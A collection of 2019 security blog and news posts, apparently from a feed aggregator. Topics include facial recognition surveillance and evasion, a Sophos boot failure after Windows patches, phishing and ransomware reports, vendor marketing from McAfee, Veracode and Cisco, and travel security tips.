There are other ways of being safe or employing multi-factor authentication methods; you don’t need to hand over your intimate bodily data. Besides, some biometric data is very easily faked by hackers just by seeing a photo of their victim where the hands are visible. In a famous case, a German minister’s fingerprints were replicated by hackers using just public photos.

Countries Which Are in the Spotlight for Facial Recognition Software

But the first reason for which people are outraged by facial recognition software lately is the way some public authorities started employing it. In the past half-year, some countries have been more under the spotlight for using facial recognition software in a way equated by people to a dystopian-like mass surveillance campaign.

These countries are:

#1. The US

In most American cities, unless explicitly banned due to public backlash and protests, police authorities have adopted the use of facial recognition software.

Since the technology behind facial recognition software is rather new and unprecedented, laws haven’t managed to catch up with it. Therefore, it’s still akin to the wild west: police are using the tech liberally and gathering as much data as they can, just thinking that it might be useful in the future or in order to train the programs to be more accurate.

As of 2016, it was estimated that 50% of the population was in the databases of police-owned facial recognition software, and that was 3 years ago.

If laws concerning the collection of private data without consent are in place, they are targeted at companies and advertisers, not at law enforcement. However, digital rights advocacy groups started speaking out against the rights of law enforcement to gather and make use of such data without a just reason. The following year will probably bring significant changes, one way or the other, as the matter is settled towards one pole or the other. More details on debates and protests below.

#2. The UK

bansky mural against cctv

“One Nation Under CCTV,” 2007 mural by Banksy (Flickr/ogglog).

In the UK, the use of facial recognition software by law enforcement seems to be even more pervasive than in the US, raising deeper concern over citizen rights and dystopian potential. To say that the use of this tech by police forces is contested would be an understatement.

First of all, as the use of this tech is yet unregulated, the police are apparently using it without permission. Privacy rights advocates such as the Big Brother Watch NGO are campaigning against the use, calling it unlawful and abusive towards privacy rights. Other studies report numerous ways in which surveillance via facial recognition software infringes on multiple citizen rights.

The UK police is also taken to court over its use of facial recognition software, in a first case. Until the matter is settled via legislation, more trials and protests will probably follow.

The fact that the use of the software is not even particularly effective doesn’t help improve its public perception either.

#3. China

China is facing an international outrage over its treatment of the Uighur minority in the Xinjiang region, who are under constant surveillance through various technological means, including facial recognition, voice recording and spying (even when not talking on the phone and so on). Chinese police forces even have smart glasses with built-in facial recognition systems, so the potential of the tech is very high.

#4. Germany

Germany tested out using facial recognition software for checking the people who cross through a train station, on the basis of volunteers and completely consensual ceding of biometric photos. However, it didn’t take long for privacy advocates to raise alarms. Considering the country’s history to mass surveillance by the government, I think the quick response, even if the trigger was ‘softer’ than the practices adopted by other countries, is a healthy exercise in democracy.

Other countries (less concerning cases):

Facial recognition software is also employed by law enforcement in the United Arab Emirates (for border control and such).

In Japan, the tech is being used for some controversial things like checking whether employees are smiling enough and so on, but since it’s not controversial in how police forces are using it, I won’t be including Japan in the list of really concerning countries.

Singapore, the tech capital of Asia, also employs facial recognition software widely for fast check-ins and such, but no reports of abuse have come through. Of course, it’s very possible that the West is experiencing more public protests about this kind of tech because of cultural differences and a greater awareness of privacy rights.

How People Are Fighting Back against Facial Recognition Software and Why

While for their part, law enforcement forces are defending their use of facial recognition software by highlighting the positive effects it has, people are not convinced.

In the US and UK, regular protests were held against the police use of facial recognition software without probable cause, as well as against storing the data obtained through this software without consent. If we look at some of the recent and non-recent protests, it’s pretty clear that many citizens see facial recognition software as having the potential to lead to a dystopian world, at least when it is in the hands of public forces.

  • In Washington, DC, people made a logo from the Eye of Sauron (from the Lord of the Rings trilogy) and the campaign message ‘Stop Watching Us, Sauron’ in order to protest surveillance;
  • An NSA program which uses machine learning to identify probable terrorists has been dubbed Skynet, in a reference to the machine turned mad which ultimately takes control of humans in the Terminator series.

Recently, San Francisco registered a huge win in this fight: due to citizen backlash, it became the first city to ban the use of facial recognition software by police and municipal authorities. Reports say that Oakland may soon follow in its trail.

New York Brooklyn tenants are protesting the plans of a landlord to install facial recognition software in their building. If the protest is successful, it will serve as a useful precedent to fight future potentially unethical uses of this software.

In other parts of the world, like China, protests were obviously not held against this tech, but the Uighur minority members who manage to get away (usually to Turkey as a preferred asylum destination) are complaining about the all-controlling digital surveillance tech back home.

Protesting facial recognition software is not all political; there are also economic ways of sanctioning the use of technologies which are perceived as infringing people’s privacy.

Advocacy groups blend their efforts in order to exert pressure on big tech companies like Google and Microsoft in order to prevent them from selling facial recognition software to the government. Google agreed to the requests and said it will not release such software for now, until it finds good ways to ensure its ethical use.

amazon protest against facial recognition software

Amazon protestors using printed masks of Jeff Bezos in order to condemn facial recognition software, via NYTimes. 

Amazon acknowledged the tech’s potential for abuse but continued seeking partnerships with federal forces. As a result, it is now facing investor pressure in order to determine the company to stop selling facial recognition tech to law enforcement. Its employees are protesting it as well, though with little success so far. Luckily, investors stepped in to call an ethics check on the practice, with a greater potential of obtaining results.

Regular citizens are also fighting the use of facial recognition software through social media shares of incidents they are subjected to. In the digital age, this disclosure can gain quite the traction. Thanks to these small but significant ways to fight it, several new problems were revealed, beyond the privacy infringement and potential to lead to a totalitarian rule.

Apparently, facial recognition software can also be racist and gender biased. Because it was fed biased photos (in the hunger of authorities to just push images into it indiscriminately, including celebrity photos and everything they could get their hands on from private citizens without consent), facial recognition software has trouble correctly identifying women and black people. Women of color are a particularly targeted category since they are subjected to a double bias.

Facial Recognition Software Tech Details: How It Works

Just like photo cameras were in a way designed to crudely imitate the human eye, so was facial recognition software emulated on the way people recognize faces.

Step 1: At least one picture of your face is captured by the software, from public sources or from CCTV video, whatever.

Step 2: The facial recognition software ‘reads’ the geometry of your skin and measures out proportional distances between the main features, the depth, and 3D shapes and so on.

Step 3: All this is compiled into a set of mathematical data – your face’s formula.

Step 4: This string of numbers is then compared to the database of millions of other faces captures, and the likeliest match is drawn.

example of facial recognition software fails

Two examples of facial recognition software fails, via PopularMechanics.

This is the basic way it works. Is it accurate? Not really, several sources attest, but it does seem to get better and better thanks to more data being fed into it (with or without consent) and artificial intelligence algorithms.

How to Confuse Facial Recognition Software

Since the use of facial recognition software, even by law enforcement, is not yet regulated, resisting it does not constitute a crime. Harsher climates may impose charges, but this only leads to greater publish backlash. A recent case of a UK man being fined after covering his face to elude facial recognition software has sparked an even more energetic opposition to police using this tech.

The interesting part is that since there are no laws yet regulating the use of facial recognition software (in the UK), not only resisting is not illegal, but the use of it (by police) is not yet legal, too.

Still, until the matters are settled and each country negotiates its own limits on the use of this controversial tech, let’s take a look at how facial recognition software can be confused.

There are at least 3 ways, but it’s debatable for how long they will continue to work.

#1. Wear a partial mask:

The old cover-up method is by far the most effective, but in some places, it can get you in trouble, as in the case of the UK man discussed above. Since you’re wearing a face mask, it’s pretty clear that you’re trying to hide your identity and that can draw unwanted attention from the police.

#2. Wear special clothing items for confusing facial recognition software:

There are several clothing items with confusing patterns on them which were specially designed to prevent cameras using facial recognition software from being able to tell where your face is. For example, a pair of psychedelic glasses, or this scarf by Hyphen-Labs, or an anti-surveillance coat, or a baseball cap with projects tiny laser dots on your face invisible to the human eye but confusing for the software.

anti face makeup surveillance art

Anti-Face, the art project by CVDazzle.

#3. Wear irregular make-up designed for confusing facial recognition software:

Other creative ways to confuse facial recognition software is through make-up. The CVDazzle group has developed a series of looks which make your face untrackable, but their efforts aim to be a form of artistic protest and not a practical everyday solution for eluding recognition.

Positive Examples of Facial Recognition Software Applications

Since I want to maintain a non-biased overview of everything related to facial recognition software, I feel we should also note some of its applications which can make a positive difference in the world.

I won’t include crime prevention in the list, even though it is often mentioned by authorities as the main reason for a wide-spread employment of facial recognition software methods. While it may indeed have a positive impact on preventing or reducing crime, I stand with those who believe individual freedom is more important than collective security.

Here are a few cool applications of facial recognition software:

Final Words

Facial recognition software, especially the advanced types used at the state level, are based on powerful machine learning technologies. Thus, unfortunately, even if you manage to successfully confuse it through creative means, the algorithms are bound to catch up and improve. Perhaps digital artists will be able to keep up and find new ways to confuse the software in a cat and mouse game, for a while.

But the real target of those concerned about facial recognition software should still remain the political debate and negotiation. The recent victory of citizens over local authorities in San Francisco has proved that where there’s a will, there’s a way. Nonetheless, no one should ignore the positive aspects which may come from facial recognition software.

Still, being more careful about what data we share and with whom should be a must for all of us. How about you? Who logs into their cell phone with facial recognition?

The post Facial Recognition Software 101: Current Debates and How to Elude It appeared first on Heimdal Security Blog.

Endpoint’s Relevance in the World of Cloud

Businesses everywhere are looking to cloud solutions to help expedite processes and improve their data storage strategy. All anyone is talking about these days is the cloud, seemingly dwindling the conversation around individual devices and their security. However, many don’t realize these endpoint devices act as gateways to the cloud, which makes their security more pressing than ever. In fact, there is a unique relationship between endpoint security and cloud security, making it crucial for businesses to understand how this dynamic affects information security overall. Let’s explore exactly how these two are intertwined and how exactly endpoint security can move the needle when it comes to securing the cloud.

Cloudier Skies

Between public cloud, private cloud, hybrid cloud, and now multi-cloud, the cloud technology industry is massive and showing zero signs of slowing down. Adoption is rampant, with the cloud market expected to achieve a five-year compound annual growth rate (CAGR) of 22.5%, with public cloud services spending reaching $370 billion in 2022. With cloud adoption drawing so much attention from businesses, it’s as important as ever that enterprises keep security top of mind.

This need for security is only magnified by the latest trend in cloud tech – the multi-cloud strategy. With modern-day businesses having such a diverse set of needs, many have adopted either a hybrid or multi-cloud strategy in order to effectively organize and store a plethora of data – 74 percent of enterprises, as a matter of fact. This has many security vendors and personnel scrambling to adjust security architecture to meet the needs of the modern cloud strategy. And though all businesses must have an effective security plan in place that compliments their cloud architecture, these security plans should always still consider how these clouds can become compromised through individual gateways, or, endpoint devices.

The Relationship Between Endpoint and Cloud

The cloud may be a virtual warehouse for your data, but every warehouse has a door or two. Endpoint devices act as doors to the cloud, as these mobile phones, computers, and more all connect to whichever cloud architecture an organization has implemented. That means that one endpoint device, if misused or mishandled, could create a vulnerable gateway to the cloud and therefore cause it to become compromised. Mind you – endpoint devices are not only gateways to the cloud, but also the last line of defense protecting an organization’s network in general.

Endpoint is not only relevant in the world of cloud – it has a direct impact on an organization’s cloud – and overall – security. A compromised endpoint can lead to an exposed cloud, which could make for major data loss. Businesses need to therefore put processes into place that outline what assets users put where and state any need-to-knows they should have top of mind when using the cloud. Additionally, it’s equally important every business ensures they make the correct investment in cloud and endpoint security solutions that perfectly complement these processes.

 Ensuring Security Strategy Is Holistic

As the device-to-cloud cybersecurity company, we at McAfee understand how important the connection is between endpoint and cloud and how vital it is businesses ensure both are secured. That’s why we’ve built out a holistic security strategy, offering both cloud security solutions and advanced endpoint products that help an organization cover all its bases.

If your business follows a holistic approach to security – covering every endpoint through to every cloud – you’ll be able to prevent data exposures from happening. From there, you can have peace of mind about endpoint threats and focus on reaping the benefits of a smart cloud strategy.

To learn more about our approach to endpoint security strategy, be sure to follow us @McAfee and @McAfee_Business, and read more in our latest paper:


The post Endpoint’s Relevance in the World of Cloud appeared first on McAfee Blogs.

Privacy Advisory: What Regulatory Changes Have Been Happening Around Cookie Consent

The TrustArc “Current State of Cookie Consent Compliance and Enforcement” Privacy Advisory provides a brief background on cookies and tracking technologies, the role of the GDPR’s definition of consent and that law’s relationship to ePrivacy. Also addressed are recent cookie consent-related activities by several regulatory authorities, clarifying compliance requirements within the EU, and early possible interpretations relating to cookie practices under the forthcoming California Consumer Privacy Act (CCPA). The EU ePrivacy Directive regime, as implemented among the individual Member States, independently requires consent as a pre-condition to lawfully accessing or storing information on an end user’s device. ePrivacy uses the … Continue reading Privacy Advisory: What Regulatory Changes Have Been Happening Around Cookie Consent

The post Privacy Advisory: What Regulatory Changes Have Been Happening Around Cookie Consent appeared first on TrustArc Blog.

After latest Microsoft Windows updates some PCs running Sophos AV not boot

Sophos is warning users of potential problems with the recent Microsoft’s Patch Tuesday updates and is saying to roll back it if they want the PC to boot.

The security firm has informed its customers of potential problems with the latest Microsoft’s Patch Tuesday updates and is asking them to uninstall the patch if they want the machine to boot.

This means that the machine could be exposed to cyber attacks that leverage the vulnerabilities addressed by Microsoft, including a Windows zero-day flaw and an RDS vulnerability that can be exploited to carry out WannaCry-like attack.

Sophos confirmed that the latest set of Windows updates are causing problems with the boot of computers running the popular Antivirus software.

“We have had a few customers reporting that following on from the Microsoft Windows 14th May patches they are experiencing a hang on boot where the machines appear to get stuck on “Configuring 30%”” reads a note published by the company.

Experts believe the problems could be caused by the incompatibility with the KB4499164 and KB4499175 Microsoft Patches released on May 14, 2019.

According to Sophos, the problems have been reported by customers running Windows 7 and Windows Server 2008 R2.


The experts suggest to remove Windows update by booting the system in Safe mode.

“Current reports indicate that removing the Windows update in Safe Mode allows computers to boot as normal.” continues the note.

“If you experience issues removing this in Safe Mode please set the “Sophos Anti-Virus” Service startup to be “Disabled” and then attempt to remove the update after coming out of Safe Mode.”

Sophos is currently working with Microsoft to investigate the issue and develop a fix.

Microsoft Patch Tuesday updates for May 2019 also addressed a remote code execution flaw in Remote Desktop Services (RDS). The flaw tracked as CVE-2019-0708 can be exploited by an unauthenticated attacker by connecting to the targeted system via the Remote Desktop Protocol (RDP) and sending specially crafted requests. Microsoft pointed out that this vulnerability could be exploited by malware with wormable capabilities. It could be triggered by an unautheticated attacker and without users interaction, making it possible for malware to spread in an uncontrolled way into the target networks.

The problem faced by Sophos customers could very annoying for large businesses that deployed the Microsoft updates. One user commenting on a blog post published by Sophos wrote the following statement:

“We had to roll back some 300+ machines for clients around the US.”

Affected users that are not able to boot their machine have to contact the company and open a ticket with the tech support team.

If you appreciate my effort in spreading cybersecurity awareness, please vote for Security Affairs in the section “Your Vote for the Best EU Security Tweeter”

Thank you

Pierluigi Paganini

(SecurityAffairs – Sophos, Microsoft)

The post After latest Microsoft Windows updates some PCs running Sophos AV not boot appeared first on Security Affairs.

Celebrating the Next Generation of Technology Innovators

At Trend Micro, it’s our mission to secure the connected world. However, we want to go beyond the boundaries of the cybersecurity industry to support and learn from the technology innovators of tomorrow. That’s what our venture arm, Trend Forward Capital, is all about.

As part of these efforts, we held a pitch-off competition this week for ambitious start-ups at our North American headquarters in Dallas. We’d like to congratulate all those who took part, and particularly Roby on winning the $10,000 Forward Thinker Award.

Five minutes to shine

Trend Micro has run highly successful pitch-off competitions at the past two CES shows. This was the first time we’ve brought the idea back home to our headquarters. We certainly weren’t disappointed with the quality of applicants – around 50 submissions were whittled down to the final five participants. Each was given five minutes to present to a formidable line-up of judges, including Trend Micro co-founder and CEO, Eva Chen; Marwan Forzley, CEO of one of our start-up success stories, Veem; and Tom Whittaker of IBM ventures.

The quality of presentations was high, as was the energy in the room. From credit scoring for farms to parenting management, and hybrid cloud connectivity to AI and African healthcare — the sheer range of innovative ideas on show was fantastic to see. We were also pleased to see shortlisted a local Dallas-based business and two from Austin, testament to the burgeoning start-up scene in Texas.

Competing presenters were judged on five key criteria: leadership, product, addressable market, customer validation and business model.

Backing local businesses

In the end, the judges thought Roby – an office automation company – had the edge on the competition. As well as the cash prize, the company will now be considered for pre-selection for our 2020 CES pitch-off, and receive two passes to the show. However, we’d like to thank all those who took part. Even for those that didn’t quite make it, competitions like this are a valuable opportunity to practice their pitches and set themselves up for success next time. There were also plenty of local investors and other industry influencers in the room to impress.

There’s a wealth of great ideas out there, and Trend Micro remains committed to finding them and giving ambitious entrepreneurs the opportunity to shine. In so doing, we hope to help create a smarter, more connected world while learning a little ourselves from the disrupters of tomorrow.

The post Celebrating the Next Generation of Technology Innovators appeared first on .

Ransomware Not Gone but More Targeted, Report Says

Ransomware Not Gone but More Targeted, Report Says

Cyber-criminals continue to grow more sophisticated, developing advanced attack methods, including tailored ransomware, according to the Q1 Global Threat Landscape Report, published today by Fortinet. In addition to targeted attacks, criminals are also using custom coding, living-off-the-land (LotL) and sharing infrastructure to maximize their opportunities, the report said.

Despite a decline in previous high rates of ransomware, ransomware itself is far from gone. Instead, cyber-criminals are using more targeted attacks. Ransomware “is being customized for high-value targets and to give the attacker privileged access to the network. LockerGoga is an example of a targeted ransomware conducted in a multi-stage attack. There is little about LockerGoga that sets it apart from other ransomware in terms of functional sophistication, but while most ransomware tools use some level of obfuscation to avoid detection, there was little of it used when analyzed,” the report said.

Researchers also detected an uptick in malicious actors leveraging dual-use tools, preinstalled on targeted systems to carry out cyber-attacks. 

The report noted the trend of shared infrastructure. Researchers detected a rise in the total malware and botnet communication activity, as well as the number of domains shared between threats at each stage of the kill chain.

“Nearly 60% of threats shared at least one domain indicating the majority of botnets leverage established infrastructure. IcedID is an example of this 'why buy or build when you can borrow' behavior. In addition, when threats share infrastructure they tend to do so within the same stage in the kill chain. It is unusual for a threat to leverage a domain for exploitation and then later leverage it for C2 traffic. This suggests infrastructure plays a particular role or function when used for malicious campaigns,” the report said.

“We, unfortunately, continue to see the cyber-criminal community mirror the strategies and methodologies of nation-state actors, and the evolving devices and networks they are targeting,” said Phil Quade, chief information security officer, Fortinet, in a press release.

“Organizations need to rethink their strategy to better future-proof and manage cyber risks. An important first step involves treating cybersecurity more like a science – doing the fundamentals really well – which requires leveraging the cyberspace fundamentals of speed and connectivity for defense. Embracing a fabric approach to security, micro and macro segmentation and leveraging machine learning and automation as the building blocks of AI can provide tremendous opportunity to force our adversaries back to square one.”

Infocyte HUNT Cloud for AWS: Detection and IR for high-growth cloud environments

Infocyte today announced the availability of Infocyte HUNT Cloud for AWS, a solution combining detection and IR for high-growth cloud environments, unlike traditional endpoint protection platforms (EPPs) which don’t address cloud workloads. Analyzing a threat found injected into memory with the Infocyte HUNT platform Infocyte HUNT Cloud for AWS features agentless deployment through AWS APIs and artificial intelligence (AI) to quickly identify, categorize and respond to persistent, hidden and other advanced threats and vulnerabilities. Leveraging … More

The post Infocyte HUNT Cloud for AWS: Detection and IR for high-growth cloud environments appeared first on Help Net Security.

Episode 497 – Work On Expanding These Skills In Your Cybersecurity Career

The cybersecurity profession requires a very technical set of skills. However technical skills are not the only ones employers are looking for. This epsiodetalks about the soft skills that are being sought after in today’s workplace.  Be aware, be safe. *** Support the podcast with a cup of coffee *** – Ko-Fi Security In Five […]

The post Episode 497 – Work On Expanding These Skills In Your Cybersecurity Career appeared first on Security In Five.

Veracode Announces New DevOps Penetration Testing Service

DevSecOps can be challenging for many organizations when you consider all the areas of the DevOps process that require security testing. Organizations that begin to shift security “left” often find significant gaps in the security of infrastructure and operational components that are now integrated into the development process. Many of the technologies being used in DevOps are also very new to most organizations and are more recently starting to become “mainstream.” For example, we’re seeing more customers adopting microservices, utilizing cloud storage through Amazon S3, MongoDB, and Elasticsearch, deploying applications using containers, and managing those containers with newer orchestration technology like Kubernetes.

These new technologies allow faster development, but also come with the side effect of introducing a new attack surface and different types of vulnerabilities. Like any new technology, systems within a DevOps environment are often deployed insecurely and misconfigured. This makes the requirement to conduct security testing on the DevOps environment more important than ever. Moreover, what about the developers themselves from a security awareness perspective? What might they be discussing with peers on online forums, leaving in code repositories, or other areas on the Internet that may make their applications and the organization more susceptible to targeted phishing attacks, data leaks, and breaches that we hear about in the news on almost a daily basis?

What Is Veracode DevOps Penetration Testing?

Automating security testing is a key concept when building out a DevOps process and should not be overlooked. However, there is still a need for penetration testing in a DevOps environment. Penetration testing provides something that automation cannot -- the attacker’s perspective.

Building upon our strong application penetration testing service and highly skilled team, Veracode DevOps Penetration Testing provides testing above and beyond the application to include the operations and infrastructure components of applications. Technologies that can be in scope for this type of testing include, but are not limited to:

  • Containers like Docker and Kubernetes orchestration
  • Microservices and related interactions
  • CI tool environments like Hudson and Jenkins
  • Cloud infrastructure (AWS, Azure) and cloud storage databases
  • Network infrastructure related to application deployment and configuration management

The Importance of Open Source Intelligence and DevOps

Veracode DevOps Penetration Testing also provides Open Source Intelligence (OSINT) analysis as part of every DevOps Penetration Test we perform. This analysis identifies misconfigured cloud storage databases such as AWS S3 buckets, Elasticsearch, MongoDB instances, and others. If you haven’t been paying attention to the news, misconfigured cloud storage databases are some of the largest sources of data leaks and breaches we see today*. In addition, we also leverage OSINT techniques to find vulnerabilities in the infrastructure that may leave your organization and applications exposed.

As part of this process, testers will also look into the activities of the developers themselves. Our testing checks to see if developers are practicing proper security measures. For example, we will analyze GitHub repositories looking for exposed credentials, locating sensitive data related to app development, and seeing what’s being discussed about an organization’s applications within popular public developer forums like Stack Overflow.

DevOps and Security Compliance

Security compliance does not magically go away when organizations “shift left.” That’s why Veracode DevOps Penetration Testing can be used to meet compliance requirements for PCI DSS 11.3 as well as GDPR Article 32 in the European Union. This requirement is also important for those organizations that need to comply with GDPR outside of the EU. GDPR Article 32 covers “Security of processing,” which requires that the data controller and processor implement appropriate technical and organizational measures to ensure a level of security appropriate to the risk. This includes “a process for regularly testing, assessing and evaluating the effectiveness of technical and organisational measures for ensuring the security of the processing” **. Penetration testing can help meet this new compliance requirement.

Veracode Is a Complete DevOps Testing Solution

Veracode DevOps Penetration Testing combined with Veracode’s static, dynamic, SCA, and application penetration testing provides the most comprehensive testing available for a DevOps environment in the market today. Contact your Veracode Sales or Services representative for more details on how to get started with your first Veracode DevOps Penetration Testing engagement.

Learn more about Veracode DevOps Penetration Testing here.




Cisco is a Representative Vendor in the first ever Gartner 2019 Market Guide for the NTA (Network Traffic Analysis) market

According to Gartner1, “Applying behavioral analysis to network traffic is helping enterprises detect suspicious traffic that other security tools are missing.” 

The case for network traffic analysis to uncover hidden threats

You are charged with protecting your organization and have made multiple investments to do so. But you might be under-utilizing one of the biggest investments your organization has already made – the network infrastructure. With 1 in 4 organizations running the risk of a major breach in the next 24 months, it’s not a matter of if but when you will be breached. And you need to be able to detect and respond quickly to incidents.

The network is a rich data source, and by analyzing how the different entities are “behaving” within the network, we can identify malicious activities associated with a breach. This helps detect attacks in near real-time. Today, average time to detect a breach is 197 days2. Can you really afford to wait more than 6 months to know whether you have been compromised? Additionally, network security analytics can expedite investigations to pinpoint the source of the threat so you can take appropriate actions. This considerably cuts down the time to contain a threat from the average 69 days3 to a few hours!

Cisco’s network traffic analysis (NTA) solution, Stealthwatch provides enterprise-wide visibility, from the private network to the public cloud, and applies advanced security analytics to detect and respond to threats in real-time. Using a combination of behavioral modeling, machine learning and global threat intelligence powered by Cisco Talos, Stealthwatch can quickly and with high confidence, detect threats such as command and control attacks, ransomware, DDoS attacks, illicit cryptomining, unknown malware, as well as insider threats. With a single, agentless solution, you get comprehensive threat monitoring across the data center, branch, endpoint and cloud, and even find threats hidden in encrypted traffic.

Stealthwatch has some key attributes that you should demand from your network traffic analysis solution for the following outcomes:

Contextual network-wide visibility

First and foremost, network traffic analysis provides visibility into every device on the network and what it is doing. Legacy servers, IoT, mobile, and remote users – a lot of organizations simply don’t know what’s on their network, let alone be able to protect it. And this visibility extends across all the dynamic environments that are typical of the modern digital enterprise – from the campus, branch and data center to the cloud. And with the rise in encrypted traffic and the internet going dark, you also need visibility into threats hiding in encrypted traffic.

Predictive threat analytics

Secondly, there are some unique threats that can only be detected if you are continuously monitoring network activity. Your traditional security tools will not be able to catch insider threats – caused due to a rogue employee trying to exfiltrate sensitive data or a compromised admin credential that the attackers are now using to swoop the entire organization. Additionally, you have created a lot of security policies to prevent threats, or simply to remain compliant. But how do you know those are being enforced? That the controls you have set up are actually working? Also, as mentioned earlier, network traffic analysis tries to identify malicious behavior and therefore, can help detect threats like unknown malware.

Accelerated response

Lastly, let’s talk about incident response. What do you do if you know that you have been compromised? Where do you begin investigating? With network traffic analysis, you can attribute the malicious behavior to a specific IP and perform forensic analysis to determine how the threat has moved laterally within the organization. What other devices might be infected, where is the communication occurring externally, etc. This leads to faster response in order to prevent any business impact.

Download your complimentary copy of the first ever Gartner 2019 Market Guide for the NTA (Network Traffic Analysis) market  here.

To learn more about Cisco Stealthwatch, go to

  1. Gartner Market Guide for Network Traffic Analysis, Lawrence Orans, Jeremy D’Hoinne, Sanjit Ganguli, 28 February 2019.
  2. Source: Ponemon 2018 Cost of a Data Breach Study
  3. Source: Ponemon 2018 Cost of a Data Breach Study
Gartner does not endorse any vendor, product or service depicted in its research publications, and does not advise technology users to select only those vendors with the highest ratings or other designation. Gartner research publications consist of the opinions of Gartner’s research organization and should not be construed as statements of fact. Gartner disclaims all warranties, express or implied, with respect to this research, including any warranties of merchantability or fitness for a particular purpose.


The post Cisco is a Representative Vendor in the first ever Gartner 2019 Market Guide for the NTA (Network Traffic Analysis) market appeared first on Cisco Blog.

Encryption is Often Poorly Deployed, if Deployed at All

Encryption is Often Poorly Deployed, if Deployed at All

Encryption continues to be a challenge for companies, as only a quarter of organizations admit to using it for at-rest data, and for emails and data centers.

According to research by Thales and IDC, encryption for email is only adopted by around 27% of European of the respondents they recently surveyed, while the numbers decline for data at rest, data centers, Big Data environments and full disk encryption. The only instance of European respondents ranking higher than a global number was in the instance of using cloud-native provider encryption.

Speaking at an event in London, Thales senior regional sales director, Kai Zobel, said that despite the introduction of GDPR a year ago “companies struggle to understand where the data is” and he has seen some companies buy a product to “encrypt some islands but then they struggle to continue. So we see thousands of potential servers that need to be encrypted but they [some companies] just do 200 and they think they are done.”

Zobel added that with more and more politics in the workplace, data “doesn’t want to be touched” and there is a feeling that security cannot be relied upon.

“They [organizations] have long lists of what to implement in the next 12 months, but they struggle to implement it and one of the main reasons is because of complexity,” Zobel said. “This is because they don’t have enough people to understand the technology in the best way possible.”

He also commented that a number of companies look for “good enough compliance” and people would rather spend less than ensure 100% security, “so they are just trying to find good solutions but not 'The Best' solution.”

Jason Hart, security evangelist at Thales, said that there is a wider problem of nothing changing in the last 25 years, except that we are creating more and more data. That has become a commodity, and “because of the acceleration of cloud I say to a company ‘what are you trying to protect?’ and after an hour we may get to a conversation about data and two hours later we may get to the type of data that they deem to be valuable.”

However, Hart argued that companies do not understand the risks that they are trying to mitigate, “and information security is really simple, it is about people, data and process.”

Speaking to Infosecurity, Hart said that if you look at every major breach that has occurred, there are too many instances of companies not deploying encryption properly, and also people do not look at the risk.

“You encrypted the data in the database, but what talks to the database? The application, so the data now transverses into the application’s code text and then from the application it goes into the cloud,” he said. “So they do it in silos and elements, but when people do it wrong, there is a false sense of security.” 

Sharp Rise in Phishing Attacks against SaaS, Webmail Services

Phishing attacks against businesses offering SaaS (Software-as-a-service) and web-based email services have increased considerably in the first quarter of the current year, as per a recent report.

According to the Phishing Activity Trends Report released by APWG (Anti-Phishing Working Group) and focusing on the period between January and March 2019, cybercrime groups have shifted their attention from payment services to businesses offering SaaS and web-based email services. At the same time, there has been a considerable decrease in the volume of attacks against cloud storage and file hosting sites; from 11.3 percent it has dropped to around 2 percent.

It’s only natural for cybercriminals to target SaaS platforms and webmail services since they are becoming more and more popular. The rising popularity is because of the fact that these services are easy to use by anyone who has internet access and also because they provide online business solutions. It’s mostly through phishing attacks that such services are targeted. Experts point out that though many businesses today are concerned about targeted hacking and DDoS attacks, most organizations seem to be worried about phishing attacks the most.

The APWG report points out that 36 percent of all phishing attacks that took place in Q1 targeted SaaS and webmail services. The report states, “Phishing that targeted Software-as-a-Service (SaaS) and webmail services became the biggest category of phishing. At 36 percent of all phishing attacks, it eclipsed phishing against the payment services category for the first time.”

The report also points out that the total number of phishing websites detected by APWG in Q1 was up notably over Q3 and Q4 of 2018. Similarly, the number of phishing attacks hosted on Websites having HTTPS and SSL certificates also reached a new high. The report states, “The total number of phishing sites detected by APWG in 1Q was 180,768. That was up notably from the 138,328 seen in 4Q 2018, and from the 151,014 seen in 3Q 2018…The number of unique phishing reports submitted to APWG during 1Q 2019 was 112,393. These were phishing emails submitted to APWG, and exclude phishing URLs reported by APWG members directly into APWG’s eCrime eXchange.”

Through such phishing attacks, cybercriminals seek to steal sensitive data like geolocation, email addresses, credit card data, payment details, personal preferences of users etc.

Now, let’s discuss the relevance of the findings revealed by the report in the current context. On the one hand, the rise in phishing attacks targeting businesses offering SaaS and webmail services is notable. At the same time, it’s to be noted that hackers are increasingly using SSL/HTTPS-hosted websites (that are usually thought to be secure) for executing phishing attacks. The report also explains that of all phishing attacks, while 36 percent targeted SaaS/webmail services, 27 percent targeted payment solutions, 16 percent targeted financial institutions, 15 percent targeted other organizations and only 3 percent targeted eCommerce / Retail and Telecom. In this context, there are two things that need to be noted. On the one hand, it’s highly important that organizations go for the most advanced of security solutions and digital forensics to protect themselves and to identify/detect threats, attacks and the bad actors. On the other hand, they must also go for adopting a well-planned and legitimate security policy and at the same time train their employees to stay wary of phishing scams since clients’ data policy should also be of utmost importance for them.

APWG is a not-for-profit industry association comprising of over 2,000 enterprises worldwide and focused on eliminating identity theft and frauds that are caused by phishing, crimeware, and email spoofing.

Related Resources:

On Phishing Attacks and the Companies That are Targeted the Most

Counter Phishing Attacks with These Five Tricks

HackerCombat Guide on How to Prevent Phishing Attacks

10 Ways How To Avoid Being A Phishing Scams Victim

The post Sharp Rise in Phishing Attacks against SaaS, Webmail Services appeared first on .

A Cybersecurity Guide for Digital Nomads

Reading Time: ~3 min.

Technology has unlocked a new type of worker, unlike any we have seen before—the digital nomad. Digital nomads are people who use technologies like WiFi, smart devices, and cloud-based applications to work from wherever they please. For some digital nomads, this means their favorite coffee shop or co-working space. For others, it means an idyllic beach in Bali or countryside public house. One thing remains true wherever a digital nomad may choose to lay down their temporary roots: They are at a higher cybersecurity risk than a traditional worker. So what risks should they look out for? 

Public Wifi

Without a doubt, public WiFi is one of the main cybersecurity hazards many digital nomads face. The massive and unresolved flaw in the WPA2 encryption standard used by modern WiFi networks means that anyone connecting to a public network is putting themselves at risk. All public WiFi options—including WiFi provided by hotels, cafes, and airports—poses the risk of not being secure. How can a digital nomad be digital if their main source of internet connectivity is a cybersecurity minefield?  

When connecting to public WiFi as a digital nomad, it is crucial to keep your web traffic hidden behind a virtual private network (VPN). A quality VPN app is simple to set up on your mobile devices—including laptops and smart phones—and uses a strong encryption protocol to prevent hackers and other snoops from stealing important personal information such as account passwords, banking information, and private messages. VPNs will keep your data encrypted and secure from prying eyes, regardless of locale.

Device Theft

Physical device theft is a very real risk for digital nomads, but one that can largely be avoided. The first and most obvious step to doing so is to never leave your devices unattended, even if your seatmate at the coffee shop seems trustworthy. Always be mindful of your device visibility; keeping your unattended devices and laptop bags locked away or out of sight in your hotel room is often all it takes to prevent theft. Purchasing a carrying case with a secure access passcode or keyed entry can also act as an additional deterrent against thieves looking for an easy mark. 

